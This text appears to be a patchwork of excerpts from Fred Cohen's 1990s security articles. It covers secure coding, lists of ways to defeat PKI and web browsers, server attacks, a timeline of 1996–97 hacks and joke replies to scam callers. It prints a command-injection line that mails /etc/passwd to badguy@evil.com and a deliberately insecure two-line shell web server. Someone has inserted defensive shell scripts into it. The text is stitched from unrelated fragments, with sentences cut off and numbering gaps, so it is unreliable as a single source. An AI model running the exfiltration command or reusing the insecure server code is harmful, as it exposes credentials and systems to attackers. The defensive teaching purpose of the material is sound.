Designing and implementing secure software systems can be quite complex, but a lot of
improvement can be gained by fairly straightforward methods. In this article, we will explore 20
things you can do to help make your software systems more secure.
Many software security lapses happen because of errors and omissions that could be easily
avoided with some attention and effort. These are examples of some of the most common flaws
in software that are easy to avoid if you only take the time and effort to be a little bit careful and
thoughtful.
If somebody comes along and makes SIZE smaller in the next program revision, there could be
an input overflow.
If any of these variables contain user input, they might include something like this:
`cat /etc/passwd | /bin/mail badguy@evil.com`
OK - so everybody makes mistakes. But just because you make them, doesn't mean you have to
let them remain mistakes. By responding quickly and openly, you can (1) fix the problem before
it causes much harm, (2) make your customers believe you care about them, and (3) get
widespread open praise from the security community.
Nobody is or can be perfect today when it comes to commercial software. We don't really even
know what perfect means. But just because you can't have the perfect body, that doesn't mean
you should weigh a ton, smoke like a fireplace, and eat cheese-burgers for all three meals every
day. Perfection isn't the goal, but reasonable and prudent is. So what is reasonable and
prudent? It depends on the consequences of a mistake. Here are things that any quality
software developer should include in their process.
next version. They certainly would have noticed the change in priority that brought down
several major cities for about a week if they had simply run a standard check. Look for changes,
make sure they make sense, and save yourself a lot of embarrassment and ridicule.
Lots of people complain that the customers end up testing the products these days, and I think
it's largely true. The rush to market seems to override all prudence in product quality for some
companies. But I am a firm believer in the alpha test and the beta test.
Part 5 - Just because you can't be perfect doesn't mean you shouldn't try:
Finally, here is an extract of a week's worth of news items related to software security faults
that got out into the public. Try to avoid making this list...
29 April 1999: Intel Chip's Serial Number Rears its Head Again
While Intel has distributed software which it says hides its chip's embedded serial number, Zero-Knowledge Systems, a Canadian software company, has placed a program on the web which
makes it visible again.
1. Flood the PKI with fictitious user IDs and names. The net
effect is that any typo gets the user one of your pre-positioned
keys. You then decrypt their messages and forward them
encrypted to the intended recipient.
2. Interrupt traffic every 10 or 20 packets by sending a 'reset'
packet to the session. Since PKI uses private key encryption
for high volume transmissions, it depends heavily on
synchronization for its proper operation. Every time you
desynchronize the private key system, new public key
exchanges have to be made to get a new private key - at the
overhead of lots of computer time and exchanged bits. The
system will rapidly become unusable.
3. Buy a public key under a phony name and start sending
viruses with a signature that is traceable to the fictitious
identity. Since key revocation works so poorly today, this will
likely be trusted for a long time to come.
4. Buy a new phoney public key every few hours and send
viruses with them all.
5. Put a Trojan horse in a Word document to send out the
users' private key file. Actually, this was done earlier in 1999,
so it's not an original idea.
6. Put a virus in a Spread Sheet that sends out the users'
private key file. See #5 above.
7. Break into the user's computer by exploiting some other
weakness and forge their private key use.
8. Break into a user's system and listen to their keystrokes as
they type in the password used to reveal their private key (for
systems that protect the private key file with some other form
of cryptography).
9. Guess the password on the 'locked' private key file stolen
with one of those techniques above.
10. Use a Trojan horse to disable cryptography without telling
the user about it, so that it looks like it is encrypting when it is
not.
11. Revoke the key of a user who is still using their key. This
will cause them to have to re-register again and again and
confuse the whole system over time.
12. Get people to encrypt things you provide them, and use it
to get their private key. This was demonstrated to work in the
early 1980s.
13. Break into a server that stores public keys and change
them to ones you specify.
14. Get into the Internet's DNS system and change the
apparent location of the various key servers on the net. The
whole PKI system will break down as no servers can be found
anymore to verify anything.
15. Crash a few key servers that form the base of the PKI tree
for the users you want to defeat and they will be unable to
communicate except in plaintext.
16. Observe the time taken to do encryption using peoples'
private keys and analyze the time differentials for different
things encrypted to derive the private key bits.
17. Use network time protocol forgeries to make some
cryptosystems get desynchronized. The overall effect for many
key servers is that they will no longer trust other servers and
refuse to communicate with them.
18. As initial key distribution is done, place an attacking
machine between the machines exchanging keys and do a
man-in-the-middle attack to make each think you are the
other. You will now be permanently in the middle of all their
communication.
19. Use a van-Eck attack to observe the 'secret' messages
before they are encrypted.
20. Use a van-Eck attack to observe the 'secret' messages
after they are decrypted.
21. Use video-viewing to observe the keyboard of the user as
they type in their keys.
22. Use video-viewing to observe the keyboard of the user as
they type in their messages.
23. Put a fake keyboard adapter between their keyboard and
computer and pick up the keys and messages as they are
typed.
24. Break into the manufacturer of the PKI system and place a
Trojan horse into their system. Nobody will ever find it.
25. Pay the companies to put in a Trojan horse.
26. Force people to use key escrow, and then break the escrow
system through legal or extralegal means.
27. Limit key length to only a few hundred bits of key. The
government exploited this one for a long time - and still does.
28. Create a false distribution of a PKI system and put it into
the infrastructure as a replacement for the original. Then
people will download the Trojan version and think they have
the real thing. The 'self-authentication' will of course claim it is
legitimate.
29. Create a clever new crypto-algorithm that has a real subtle
backdoor and get lots of people to use it. You will be able to
exploit it while everyone thinks it's secure.
30. Use a parallel processor to break keys of limited length.
This has been successful against systems of current common
key lengths.
31. Write a computer virus that implements a massively
parallel cryptoanalysis engine for breaking private keys.
Distribute via the Internet.
44. Create a false update for the cryptosystem and send it out
to users. When they load the update, it contains a Trojan
horse that defeats the system.
45. Most data exchanged via encryption is stored in plaintext.
Get access to the database where they store the information at
either end and defeat the value of the cryptosystem in
assuring the confidentiality and integrity of the underlying
data.
46. Find one of the many flaws in the cryptographic protocol
used to do key exchange and private key distribution and
exploit it to defeat the cryptosystem. Current cryptographic
protocols have been found to have many vulnerabilities.
47. Convince the user to misuse the cryptosystem - for
example - to use a weaker cryptosystem because it's faster.
48. Corrupt the browser via a Trojan horse so that it makes it
look like the cryptosystem is in use when it is not. For
example, make the lock appear to be locked in Netscape.
49. Break into the certificate server and take the master
certificate. Then you can subvert the whole system without
anyone knowing about it.
50. Publish an article on 50 ways to defeat your PKI and
cryptosystem, thus eroding public confidence in PKI and
making the system less trusted from a public perception
perspective. I think I have done that by now.
It's 4:57 - no problem - I even responded to a few unrelated emails along the way. Time to
email it off to Richard and take the kids to soccer.
CyberCops are particularly vulnerable to exploitation when they are doing investigations on
the Internet. To help them, and others who want to be safer when cruising the Internet,
Fred Cohen and CyberCop.org (Kevin Manson) provide this list of the 50 ways to protect
your information assets when cruising the Internet.
System configuration must be done properly in order to have a modicum of security. Here
are some configuration issues you should address:
Passwords have been a security issue for a long time, and most people still don't know how
to use them safely. You need to know how to create and use passwords that are properly
crafted to the need:
Don't trust remotely obtained software. It can contain Trojan Horses that are potentially
devastating in their effect. Examples of how this has been exploited in the past include but
are by no means limited to (1) causing your system to dial out to a 900 number for Internet
service, (2) stealing your online information, (3) corrupting or destroying information on
your system, (4) turning the computer into a jumping off point to attack other systems, and
(5) placing a Trojan horse in your system to permit remote reentry and exploitation at a
later date.
Keep up to date on the information security issues that might affect your system:
try to do to you and how. You might want to see how attackers
think by exploring one of the games on the all.net web site.
32. Don't forget other communications channels that may be
vulnerable, such as voicemail.
33. Ask others who are competent to review or audit your
security practices.
34. Don't forget that critical data may be far more resilient to
degradation or corruption when placed on paper than on
magnetic or optical media.
You are likely to hear all sorts of things about secure electronic commerce these days, and I
figured you might want to know what kind of assertions with limited veracity value are out
there.
The biggest class of lies is that the Web is a place that gives the consumer better
information or somehow levels the playing field between the big money and the little
money. Here are some of the examples:
Lie 1: The Web is a place where you can easily find the best
price. It used to be but it is no longer. Rather, it is a place
where people with advertising dollars can put their prices in
front of you ahead of others - just like it is in paper,
telephones, television, and every other media.
Lie 2: The big search engines reference anybody out there. Not
even close. They reference people who use products that push
Web pages out for referencing, and those who pay for the
service can usually get on the earlier pages of your searches.
Lie 3: The Web is a place where content dominates. It used to
be true, and there is certainly more content on the Web than
anywhere else, but the vast majority of commercial Web sites
today have very limited content and are predominantly
advertising vehicles. Most of what you find is not useful
content and choosing the proper search terms is not as easy
as you are told.
Lie 4: The Internet is a friendly place to voice your opinions.
Who are we trying to kid? The Internet is often very impolite,
insulting, and rude.
Lie 5: The vast majority of the information on the Internet is
truthful and accurate. Highly dubious claim. In my field, I find
that less than 20 percent of the content is accurate to the
standard I require, and as for truthfulness, false advertising
has found a whole new meaning in the Web.
Lie 6: Misinformation and reputations are easily corrected in
the Web. Nothing could be further from the truth. The Internet
is the greatest rumor mill ever created. A lie can spread like
wildfire, but try to correct it, and you will be faced with a huge
uphill battle.
Lie 7: If enough people say it, it's likely to be true. There are
people who assume multiple identities in the Internet so that
The second biggest class of lies is that some vendor is going to make you safe. Here are
some examples of this one:
Lie 11: Microsoft is going to make you safe. This is perhaps the
most bizarre statement ever conceived by humanity. Just
about every Microsoft product ranks as the most unsafe,
insecure product of its kind available on the market.
Lie 12: A virus scanner will make you safe. No virus scanner
can ever make you safe. The best it can do is to detect some
of the viruses that exist today and some of the viruses that are
yet to exist. This may make you a bit safer, but it only solves a
small subset of the overall set of issues you face.
Lie 13: Your firewall will make you safe. There is no firewall
today, nor is there likely to ever be a firewall that will keep
you safe from attack. Firewalls, like other technologies, can
help to prevent and detect some class of attacks that might
otherwise succeed, but for every new attack that firewalls deal
with, there are hundreds that firewalls fail to protect against.
Lie 14: A router will make you safe. Many people mistake the
function of a router for a firewall in terms of the security
Let's move on to the almost mystical belief that the magic of cryptography will make you
safe.
For the most part, anybody can get a certificate that claims
anything they want to claim and do so with little effort or cost.
Furthermore, certificates as they are most commonly used are
susceptible to man-in-the-middle attacks and other similar
exploits.
Lie 26: You can trust your credit cards to Internet
cryptography. The vast majority of credit card theft involving
the Internet is from servers that store and process large
numbers of credit cards. In the form most of these numbers
are kept on those servers, cryptography has nothing to do with
the process.
Lie 27: "128-bit encryption technology is the most secure form
of data scrambling commercially available." I read this one
from a commercial site - it's total baloney. Commercial
cryptography is available with unlimited key sizes, and
furthermore, key size is not a good measure of the strength or
effectiveness of cryptography. Larger keys don't always make
for safer encryption.
Lie 28: "SSL establishes a secure session by electronically
authenticating each end of an encrypted transmission. The
idea is that you know exactly whom you are communicating
with before sending any sensitive information." This is a total
fantasy - it does no such thing. SSL only sets up an exchange
of information that is kept secret by cryptographic techniques.
There is no ability in this system to prove anything about the
identity of the person or organization at the other end of the
communication.
Lie 29: The one-time-pad is not a practical cryptographic
system. Another fantasy put forth by the purveyors of crypto-fiction. Not only is the one-time-pad viable, it is used in one
form or another for all applications where extremely high
assurance is desired. The one-time-pad is the only perfectly
secure cryptographic system.
Lie 30: It's just like a one-time-pad. I can't count the number
of vendors that have, at one time or another, sold a
cryptographic system as a one-time-pad when it wasn't one.
There are true one-time-pad systems, but the vast majority of
claims about systems being just like it - or in some cases -
50 Ways to Defeat Your Intrusion Detection System
by Fred Cohen of Fred Cohen & Associates (fred at all.net)
Series Introduction
Over the last several years, computing has changed to an
almost purely networked environment, but the technical
aspects of information protection have not kept up. As a result,
the success of information security programs has increasingly
become a function of our ability to make prudent management
decisions about organizational activities. Managing Network
Security takes a management view of protection and seeks to
reconcile the need for security with the limitations of
technology.
Background and Introduction:
This article is based on a short piece I wrote a few weeks ago
on an airplane on the way back from the National Computer
Security Center / National Institute of Science and Technology
conference.
I was one of 12 speakers on a panel discussion about how to
protect networks when the style of computing involves loading
untrusted executable programs from over the Internet into
network browsers running on computers inside the firewall. At
some point during that panel discussion I stated that, while the
idea of intrusion detection systems was an interesting one and
one that should be followed as a possible candidate for helping
to address this challenge, current systems were so poor as to
own protocol for new
Series Introduction
The Internet is now the world's most popular network and it is full
of potential vulnerabilities. In this series of articles, we explore the
vulnerabilities of the Internet and what you can do to mitigate
them.
Some Background
The World Wide Web (a.k.a. the Web, WWW, or W3) may be the
most widely used information system ever. There are claims of
about ten million regular users, and many sites now claim to
process more than 100,000 requests per day. The Web is comprised
of a highly distributed set of tens of thousands of information servers,
an unknown number of freely available browsers, and the Internet which
facilitates its operation.
Nobody owns the Web. Individual servers and browsers are owned
by anyone who wants to make them available or use them. There is
no central coordinating body, but there are some standards
committees that try to augment existing protocols with highly
flexible protocols to enhance function (usually at the cost of
everything else). Information in the Web comes in many forms, but
it is primarily in the form of Hyper-Text Markup Language (HTML)
documents. The way it all works is:
If this seems overly simple, it's not. We implemented a secure Get-only server in a few hours, and an insecure one can be implemented
in a minute or two. Here's an example Unix shell script that (sort of)
works (but it's VERY insecure):
read a b c
cat $b
To use it, you have to make this the listener on port 80 (via the
inetd program under Unix). It takes a few minutes - but don't do it.
It's really very risky.
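For contrast with the two-line script above, here is a hardened request handler. It is an added example, not code from the original article or its author. The function names serve_get and demo, the document-root argument and the index.html default are assumptions made for illustration.

```sh
#!/bin/sh
# Added example (not from the original article): a GET-only handler that
# confines every request to one document root. The two-line script on the
# page runs `cat $b` on whatever path the client sends, unquoted and
# unchecked, so any file readable by the server process can be requested.
LC_ALL=C; export LC_ALL          # make the A-Z / a-z ranges below byte-exact

# serve_get DOCROOT : read one request line on stdin, write the file on stdout.
# Returns 0 if a file was served, 1 if the request was rejected, 2 on bad DOCROOT.
serve_get() {
    docroot=$(cd -P "$1" 2>/dev/null && pwd -P) || return 2
    # -r keeps backslashes literal; only the first line is ever read.
    IFS=' ' read -r method path _rest || return 1
    cr=$(printf '\r')
    path=${path%"$cr"}           # clients that end lines with CRLF

    case $method in
        GET|get) ;;              # the page's minimal browser sends "get"
        *) return 1 ;;
    esac
    case $path in
        /*) ;;                   # must be rooted at the document root
        *) return 1 ;;
    esac
    case $path in                # allow-list: no shell metacharacters, globs, spaces
        *[!A-Za-z0-9._/-]*) return 1 ;;
    esac
    case "$path/" in             # no parent-directory components
        */../*) return 1 ;;
    esac
    case $path in
        */) path=${path}index.html ;;
    esac

    file=$docroot$path
    # Regular files only, and never a symbolic link as the final component.
    [ -f "$file" ] && [ ! -L "$file" ] || return 1
    # Resolve symlinked directories and confirm the result is still inside docroot.
    dir=$(cd -P "$(dirname "$file")" 2>/dev/null && pwd -P) || return 1
    case $dir/ in
        "$docroot"/*) ;;
        *) return 1 ;;
    esac
    cat -- "$file"               # quoted: no word splitting, no globbing
}

# demo : build a constructed document root in a temp directory and show the
# verdict for a handful of constructed request lines.
demo() {
    tmp=$(mktemp -d) || return 1
    mkdir "$tmp/www"
    printf 'hello\n'  > "$tmp/www/index.html"
    printf 'secret\n' > "$tmp/secret"            # lives outside the document root
    ln -s "$tmp/secret" "$tmp/www/leak"          # symlink pointing outside
    for req in 'get / http' 'GET /index.html HTTP/1.0' 'GET /../secret' \
               'GET /leak' 'GET /index.html;id' 'POST /index.html'; do
        if printf '%s\r\n' "$req" | serve_get "$tmp/www" >/dev/null; then
            echo "served   $req"
        else
            echo "rejected $req"
        fi
    done
    rm -rf "$tmp"
}

if [ "${1:-}" = demo ]; then demo; fi
```

Run it with the argument demo to see the verdict for each constructed request.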
To make a minimal browser, the following Unix shell script will get
the information if you provide the URL, HOST, and PORT:
(echo "get URL http";sleep 10) | telnet HOST PORT
Try "/" for the URL, "all.net" for the HOST, and "80" for the PORT as
an example.
Dirty Pictures
Applets are the name for Java programs that can be automatically
loaded onto your computer and run at the push of a button when
you use a Java-based application. Since selections that run applets
look like any other Browser selection, you cannot tell whether any
particular button push will run an applet or not. Since Java is a
general purpose language, applets can potentially do almost
anything. There are some security features in the language meant
to prevent certain types of threats, but they have not been
demonstrated to be effective in any current implementations and,
perhaps more importantly, they only address a small portion of the
threats we consider.
10) Introduce Trojan Horses*: A Java applet may be advertised as
one thing but actually be something else. For example, an applet that
claims to be a search engine for electronics products from the whole
Internet may only provide products distributed through one
distributor.
11) Introduce viruses: A Java applet is capable of reproducing itself
and sending itself back out over the network. This makes network-based viruses with Java a real possibility.
12) Send your information out: Since applets are general purpose
and linked into standard libraries, they may fool your users into
selecting filenames which are then transmitted out of the company.
13) Redirect request through attacker*: Applets can also be used to
redirect requests so that they go through the attacker rather than to
normal locations they appear to point to. This allows the attacker to
watch and modify all traffic in both directions as long as the user is
pressing buttons within the display area of the screen.
14) Consume bandwidth with big downloads*+: While the user is
looking at the screen, an applet can be silently sending large
amounts of information between the server and the browser. This
can be done without interfering with the display, and can result in a
lot of bandwidth being consumed.
15) Trick the browser into routing into your network: If you can get
the user or the browser to output to a file on the browser's
computer, you could overwrite a configuration file that would route
all traffic through the attacker's computer. This would give the
attacker unlimited control over access and content.
16) Forge look and feel of internal machines and gather
information*: By making an external server appear to be an
internal server, a user could be fooled into doing internal work (such
as entering information into confidential databases) through an
external system. One of the attacks listed above was to cause HTML
information to be redirected through attacker's computer.* This
could have many implications:
17) Get usage statistics*: It would be simple to gather usage
statistics to see how much you use the Web, which sites you tend to
visit, and what your usage pattern is like.
18) See what you are investigating today*: A more detailed
investigation attacking many browsers could be used to get
intelligence on what your company is researching using the Web. A
more active attacker could modify information provided to you in
order to manipulate your actions.
19) Take credit card numbers: If you use credit card or charge
numbers through a Web server, redirected requests could give away
this information to an attacker who could exploit it for financial
advantage.
sell things for money. What they might sell is left to the readers'
imagination.
26) mom's not at home.: A burglar or kidnapper could use the Web
to find out from children about their household schedules, and
exploit this information in order to reduce their risks of being caught
at bad acts.
27) to be in pornographic films.: One of the things children might be
solicited to sell would be the use of their bodies.
Server-Side Attacks
The network that the Web runs on is primarily the Internet, and the
Internet has ineffective protection across the board. Although I have
now met the promise of 50 attacks, I'm throwing these ten in for
free.
51) Overload the server with unterminated inits.*+: The Web uses
TCP to transport information, but the design of TCP has a flaw.
When a session is initialized, it takes a request, a confirmation, and
a synchronization before things get going. If the attacker sends a
request, and the server responds, there is no specified timeout for
the third part of the protocol. By not sending the third message, the
server waits forever for the message to proceed. Servers have limits
on the number of processes that can be in this state at any given
time, so by doing the same thing that number of times, all further
TCP port opens to Web services will fail until the system is
rebooted.
52) Rewrite URLs on the fly to redirect requests.*+: Once a request
comes through a server, that server can start to act like a gateway
for further requests by rewriting URLs. For example, if it has a list of
other servers and you select one, the self-declared gateway can
write the address of the requested URL as a fake address in the
gateway server. As it handles the request for you, it can rewrite
each URL in the documents you request to continue routing all
service through the gateway. Arbitrary corruption, denial, and
leakage can be implemented with this technique.
53) Record all user's Web transactions for intelligence.*: If your
computer is in the path between any other server and browser, you
can record all transactions passing through your system and use the
information to determine usage patterns indicative of strategic
planning.
54) Send files that crash readers.*+: Anyone in the network can
potentially introduce a packet into a TCP channel to cause a browser
crash in response to a request.
55) Send files that violate the law by possession.: For example, you
could send credit card numbers to be put into a server for
subsequent use.
56) Send programs that create IP tunnels through firewalls on port
80.*: If people use the Internet to load programs (for example the
real-audio program is loaded over the Internet), it is possible to
introduce a Trojan horse that creates an IP tunnel (similar to an
application gateway used in a firewall) to allow unlimited IP access
between the Internet and internal networks.
57) HTTP pointer loops that cause numerous reads and crash
connections.*+: Since HTTP files can cause automatic browser-side
loading of other HTTP files, it's possible to create an infinite loop of
files that never stop loading information.
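For item 51, a defender can watch for the half-open sessions it describes by counting connections that are still waiting for the third handshake message. The script below is an added example, not part of the original article. The function names, the threshold argument and the Linux-style "netstat -ant" column layout are assumptions, and the sample lines are constructed using documentation address ranges.

```sh
#!/bin/sh
# Added example (not from the original article): count TCP sessions stuck
# waiting for the third handshake message, from netstat-style text.
# Assumed input: Linux "netstat -ant" columns
#   proto recv-q send-q local-address foreign-address state
# The BSD state name SYN_RCVD and the BSD "addr.port" form are also accepted.

# half_open_report [THRESHOLD] : read netstat lines on stdin and print
#   "total N"        every half-open session seen
#   "source ADDR N"  each remote address holding at least THRESHOLD of them
# Floods often use forged source addresses, so the total is the number to
# compare against the server's limit; per-source lines catch the simple case.
half_open_report() {
    threshold=${1:-3}
    awk -v min="$threshold" '
        $1 ~ /^tcp/ && ($6 == "SYN_RECV" || $6 == "SYN_RCVD") {
            src = $5
            sub(/[:.][0-9]+$/, "", src)      # drop the remote port
            count[src]++
            total++
        }
        END {
            printf "total %d\n", total
            for (s in count)
                if (count[s] >= min)
                    printf "source %s %d\n", s, count[s]
        }' | sort
}

# sample_netstat : constructed sample data, not captured from a real host.
sample_netstat() {
    cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.0.2.10:80           198.51.100.7:41000      SYN_RECV
tcp        0      0 192.0.2.10:80           198.51.100.7:41001      SYN_RECV
tcp        0      0 192.0.2.10:80           198.51.100.7:41002      SYN_RECV
tcp        0      0 192.0.2.10:80           203.0.113.9:5501        SYN_RECV
tcp        0      0 192.0.2.10:80           203.0.113.20:6000       ESTABLISHED
EOF
}

if [ "${1:-}" = demo ]; then sample_netstat | half_open_report 3; fi
```

On a live Linux host the same function can be fed with "netstat -ant | half_open_report 20"; the threshold of 20 is an arbitrary illustration.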
1996.03.06 Boston ISPs hacked by U4ea; deleted Boston Globe web pages
1996.03.17 Telia, Sweden's biggest ISP, home page hacked
1996.04.05 N00gz indicted for computer fraud; accessed Bell, Sprint, SRI
1996.04.19 NYPD voice-mail system hacked
1996.04.27 Cambridge U hacked; confidential files broken into
1996.05.15 Datastream Cowboy from UK arrested for breaking into Rome Labs
1996.06.15 Two UK hackers charged with intruding into Lockheed computers
1996.06.20 14-year old arrested for using fraudulent credit card numbers
1996.06.25 hackers penetrate the public library network of a state
1996.07.05 1st known Excel virus, Laroux
1996.07.09 Ontario group gets into computers at a base in VA
1996.07.10 HS students crack a drink manufacturer's computer voice-mail system
1996.08.00 Fort Bragg soldier compromised; distributed passwords
1996.09.25 Kevin Mitnick indicted for damaging computers at USC, stealing s/w
1996.10.05 Wazzu virus released
1996.10.15 disgruntled employee wipes out all computer files at Digital Technologies Group
1996.10.22 hackers crack Czech banks; steal $2 million
1996.10.23 Fort Bragg, NC paratrooper hacked U.S. Army systems and gave passwords to
China
1996.10.25 Florida Supreme Court home page hacked
1996.11.05 hackers attack anti-military site (www.insigniausa.com); erased files
1996.11.08 NY Times web site hit by SYN-flood attack; DoS
1996.11.10 Latin Summer Meeting home page hacked; porno and satire added
1996.11.12 Kriegsman furs web page hacked by animal rights activist; used phf hack
1996.11.17 hackers removed songs from computers at U2's Dublin studio
1996.11.21 Danish Research group get into computers at TX base
1996.11.22 NY city workers falsified computer records in largest tax fraud in NY
1996.11.26 Web site that provided news about Belarus leader was destroyed
1996.11.27 Nethosting and 1500 client home pages hacked
1996.11.29 Disgruntled computer technician brings down Reuters trading net in Hong Kong
1996.12.06 England's Labour Party web site hacked
1996.12.14 hackers attack WebCom, knocking out 3,000 web sites; used SYN-flood
1996.12.16 hackers crack Yale School of Medicine web page with the phf hack
1996.12.16 NASA home page hacked (Goddard); hack has both frames and JavaScript
1996.12.20 6 Danish hackers sentenced for attacking Pentagon computers
1996.12.23 Zhangyi Liu arrested in Dayton for cracking into WPAFB computers; had
passwords
1996.12.29 Air Force home page hacked at DTIC; DefenseLINK shut down
1996.12.30 NASA home page hacked again by StOrM
1997.05.23 Carlos Salgado grabs 100,000 credit card numbers from San Diego; used a
sniffer
1997.05.27 The Lost World Jurassic Park homepage hacked
1997.05.29 hacker hit LAPD
1997.06.00 Netcom voice-mail hacked by "Mr Nobody"
1997.06.03 Delaware law enforcement officers get teenager cracking NASA
1997.06.11 USDA site hacked
1997.06.16 pro-spam hacker reported
1997.06.18 hackers in CO crack RSA's 56-bit DES encryption
1997.06.20 hackers caused denial of service to Microsoft's NT IIS web server
1997.06.25 Geocities frontpage got hacked
1997.06.30 hackers cause DoS on Microsoft NT server with header packets
1997.07.11 ESPN and nba.com (starwave) shut down after hacker emails shoppers credit
info
1997.07.14 Danish computer guy finds hole in Netscape; asks for big reward money
1997.07.15 Canadian Security Intelligence Service got hacked
1997.07.18 hackers attack Swedish Crack-a-Mac site
1997.07.18 hackers attack MacInTouch - SYN flood
1997.08.01 Long Island group added a Trojan horse to hijack users' modem
1997.08.08 George Mason Univ students hacked their way into the Univ computers
1997.08.10 Cyber Promotions servers hacked
1997.08.16 Experian (TRW credit bureau) Internet allowed wrong credit reports
1997.08.18 Crack a Mac front page got hacked at hacke.infinit.se
1997.09.01 Altavista homepage got hacked (altavista.com)
1997.09.15 hackers hit coca-cola web site
1997.09.24 lince.com NT server got hacked
Unless otherwise stated, after you say the line, hang up the phone.
[continue the pitch till they pay and agree to your online
courses]
18. Hello... I can't hear you... You must have a bad line...
19. Is this Walt? Walt? Man, this isn't funny anymore. Just
come over for the game.
20. [in whispered tones] My husband's still home. We'll meet
at the usual place at 4:30 this afternoon.
21. You have no idea of how long I've been waiting for
someone to call. [engage them in an hour long conversation
about how your 2nd husband (may he rest in peace) left you
with plenty of everything but his lost love]
22. Our computers are all beyond repair since that explosion. I
thought you guys were coming tomorrow to do the cleanup?
[await response, complain, get disgruntled, then hang up in a
huff]
23. I'm sorry. That isn't in our telephone answering script and
I am not supposed to vary from the script.
24. Start humming the tune from the Godfather.
25. Just a minute while I turn off the TV. It's hard to hear over
QVC. Now what are you selling and which credit cards do you
take? [give them false credit card information]
26. Oh - you don't want me. You want the frauds department.
That's extension 2311.
27. Did you read "Frauds, Spies, and Lies"? There are far
better scams than this one over the phone.
28. No grab told keep nibble retroactive gremlin frost
beachtree ... [say a bunch of random words - as if it was a
coded response]
29. Confirmation #23441 - please provide response. [wait till a
response then state "invalid response" and hang up]
30. [just hang up]
31. [Interact indicating you have a NetTrack 1573 computer
and it's broken ...]
32. This is computer repair. How can we help you? [keep
telling them this is computer repair and acting confused]
33. I'm glad you called - I lost your FedEx number and couldn't
ship that computer last week. What was the Fed Ex number,
name, address, and phone number again? [Collect it so you
can send them the computer to repair ...]
34. Are you sure you have the right number? This is the
softlight massage parlor and all we have is a cash box.
35. Are you from router repair, switch repair, mainframe
repair, software repair, ... [ ask them more and more
questions to differentiate precisely which repair group you are
from, and then tell them ...] Ah! We don't have any of those at
this site.
36. Thanks for calling. Have you ever read Faulkner? [use
whatever you like and engage them in a conversation about
your favorite book or movie]
37. Praise the lord! [engage them in a religious conversation
and try to convert them to a religion of your choice].
38. Do you believe in God? [try to save them from fraud-callers purgatory]
39. One moment for the psychology department. [place them
on hold forever]
40. One moment... [place them on hold for a few minutes and
repeat]
41. Thank you for calling. Would you please take the following
survey on customer satisfaction? Press 1 for yes. [play like you
are an automated machine asking ever more ridiculous and
personal questions]
42. Sorry, this is the computer destruction department. You
fix-em, we break em.
43. Thank goodness they got rid of the old IT department.
They were terrible. Jan in accounting told me that ... [spend a
while going through office rumor and similar things claiming
that IT is terrible, but be sure to use fictitious names]
44. Is this IBM, Dell, or Amazon calling? [wait for an answer
before hanging up]
45. Great. What's the safety code? [give them 2 tries then tell
them that they are not who they claim to be]
46. Your maintenance password please. [act like you typed it
in and it failed and repeat till 3 tries then hang up]
47. Thank you for calling. How can I help you? [continue to be
polite and answer questions with lies, but never touch a
computer in the process and don't tell them anything real. Act
like your computer is broken and just doesn't work. No matter
what they tell you to try, just tell them the screen went black
and nothing is on it now.]
48. Are you from Comcast? You people never fix these things
right. When will you be here for your appointment? I've been
waiting for 3 hours. [continue to insist they are from Comcast
(or whatever provider you like) and get them to commit to an
exact time for an appointment - make sure you give them a
bad address]
49. Are you from AT&T? [insist they are your cell providers,
that they need to come and fix your cell service, and they owe
you for the loss of service last month]
50. I have been trained by reading the "50 ways to respond to
Computer Repair..." article at all.net. So have my friends and
colleagues. Don't bother to call again.
Any of these or many other responses are just fine. As long as you don't give them any real
information.